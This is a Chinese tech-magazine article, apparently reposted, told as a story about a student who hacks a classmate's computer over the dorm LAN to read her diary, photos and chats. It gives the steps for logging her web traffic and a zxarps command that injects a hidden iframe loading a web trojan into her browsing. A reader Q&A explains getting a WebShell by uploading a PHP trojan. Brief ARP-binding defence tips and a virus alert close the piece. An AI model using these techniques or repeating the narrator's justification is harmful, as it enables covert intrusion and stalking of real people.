什么是arp欺骗?先来看个故事吧。
开学了,无视那些校园里的谈情说爱,我继续我的黑客学习,在网络中找寻到挑战的快感。但是就在昨天,一个偶然的擦肩而过激活了我的荷尔蒙。她是那么的美丽,在飘满饭菜味的食堂中我仍然隐约地闻到了与她擦肩而过时飘来的淡淡茉莉香。她是谁?以前怎么没见过?
虽然宿舍的弟兄们一直嘲笑我是故意的,但我仍然认为是上帝的手推了我一把。我拿起饭盒从座位上站起来绕过她身边的那一刻,仅仅是想看看她桌子上的课本封皮,好确认她学的是什么专业。但是不知道哪个该死的,把一碗黏糊糊的粥洒在了地上,无意中踩到,我很英俊地摔倒了,饭盆和里面的剩菜以标准的抛物线落在她的脖子上。
随后事情的发展进度超出了我的想象力,我们很快地就交换了姓名、专业、宿舍号码等私人信息,当然最后她也告诉我,她身上穿的那个印着卡通熊的衣服叫TeenieWeenie,一周前她父亲买给她的,价值2180元……唉,女人的衣服……怎么这么贵?
不管怎么样,我现在都是负资产了,信用卡严重透支,虽然我知道了她的宿舍号码和姓名,但是价格也太贵了点儿吧。于是我决定,通过宿舍楼局域网,入侵她的电脑,将木马植入到她的电脑中,翻看她的照片,偷看她的日记,监视她的QQ,我太坏了。Tw.WINGWIt.com不过想想那2180元,我认为我有这个权利!
我坐在电脑前思索了许久,最终我决定用ARP欺骗敲开她电脑的大门。ARP是一种地址解析协议,该协议用来解决一个节点上的下一跳IP地址到MAC地址的转换。ARP欺骗就是截获网关数据或者伪造网关发送虚假数据的技术,以达到制造网络通讯混乱的目的。
局域网中寻找她
几经努力,我得知她宿舍的几台电脑都是一个人帮忙配的,电脑名称默认设置的是宿舍门号加姓名拼音。于是,我准备用网络监控软件Active Wall(软件下载地址:http://www.cpcw.com/bzsoft)嗅探她的位置。
软件启动后,自动扫描嗅探出了局域网所有电脑,主界面中还会显示出每台电脑的名字和发送接收字节的多少(图1)。根据“电脑名称”找到了正在上网的她。
偷看她的上网记录
我决定拦截她的访问信息,看看她上网都干了什么。点击“分组管理”中的“策略配置”,选择“HTTP过滤”选项。在新弹出的“HTTP过滤配置”对话框的“网址”页面中输入“*”号,接着在“策略规则”选项中选择“通过并记录”(图2)。
我之所以不在网址一栏中输入具体的网址,是因为用“*”号通配符可以知道她访问的所有网站,而不会局限于某个网站。20分钟后嗅探出的所有内容显示在“事件记录”中,我将嗅探出的网址日志复制导出,对她的浏览习惯进行了大致的分析,在这段时间里她先后登录了学校教务网站、新浪博客、Qzone、某时尚杂志网等。
成功掌控她的电脑
想要利用ARP欺骗实现在她的电脑中植入木马的目的,仅仅通过Active Wall嗅探是无法实现的。真正的战斗必须准备几样专业的ARP欺骗工具,分别是网络访问系统工具Winpcap、ARP欺骗工具Zxarps、网页木马。
然后我打开Windows自带的记事本,在记事本中写入“zxarps.exe -idx 0 -ip 192.168.1.8-192.168.1.11(需要欺骗的IP地址段,根据实际情况修改)-port 80 -insert " <iframe src='网页木马地址' width=0 height=0>" ”,再点击记事本的“另存为”,将内容另存为.bat格式的文件,并将该文件与Zxarps保存在同一个目录中。
批处理运行后,Zxarps迅速将<iframe src='网页木马地址' width=0 height=0>这段代码插入到指定的远程电脑浏览的每一个网页中(图3)。十五分钟之后,标有她名字的电脑出现在我的木马监控端中。也许从我和她相遇的那一刻起一切都是偶然,但是我相信,所谓偶然,只不过是我们对复杂的命运的无知罢了……
巧妙抵御ARP欺骗攻击
从去年开始,ARP欺骗攻击就开始流行起来。要防御这种攻击,我们可以使用MAC绑定法来解决问题。首先在命令提示符下输入“Ipconfig/all”,然后继续在命令提示符下输入命令“ARP -s IP MAC”,就可以将MAC地址和IP地址捆绑在一起了。
这样,就不会出现IP地址被盗用,不能正常使用校园网的情况了,从而有效保证电脑的安全。不过对于某些IP地址不固定的校园网来说,最好的方法仍然是使用专业的ARP防欺骗软件,例如AntiArp(软件下载地址:http://www.cpcw.com/bzsoft)。
回音壁
读者 汪冰:看过上期的《买论坛点券“附送”管理员权限》之后,我成功地进入了网站的管理后台,但是我在尝试取得WebShell的控制权时总是没有办法成功,请问要取得WebShell的控制权有什么诀窍?
小新分析:在某些支持PHP环境的服务器中,可以通过修改“论坛博客”模块中的文件设置,将PHP作为新后缀添加上,然后再通过Blog文章发布功能将你的PHP木马上传就可以了。这种夺取WebShell的控制权的方法要求对方的服务器必须是支持ASP和PHP两种解析方式的服务器。
一周病毒焦点:线上游戏窃取者变种竟会关闭扬声器
警惕程度:★★★
危害指数:★★★
瑞星监测网监测到线上游戏窃取者变种LUF(Trojan.PSW.Win32.GameOL.luf)病毒在网络上大肆传播。它是一个用VC语言编写的木马。运行后,首先将系统的扬声器设置成静音,避免杀毒软件和安全工具发出警告声响,并试图关闭多种主流杀毒软件和安全工具。
然后它将自身复制到系统目录下,修改注册表启动项实现开机自启动。同时,还会加载到所有进程中,在后台监视和窃取用户网游账号、密码等信息,并发送到黑客指定的邮箱使玩家蒙受损失。
清除方法:使用最新病毒库的杀毒软件查杀,例如瑞星的病毒库要升级到20.35版。此外,我们可以使用能保护网游账号和密码的一些专用工具,防止它们被病毒窃取。
From:http://tw.wingwit.com/Article/Network/201311/24466.html